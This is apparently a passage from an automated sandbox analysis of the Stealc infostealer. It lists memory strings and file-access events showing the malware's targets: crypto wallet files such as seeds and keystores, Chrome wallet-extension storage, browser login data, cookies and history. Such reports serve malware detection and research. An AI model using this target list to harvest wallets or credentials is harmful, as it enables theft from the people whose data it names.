Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
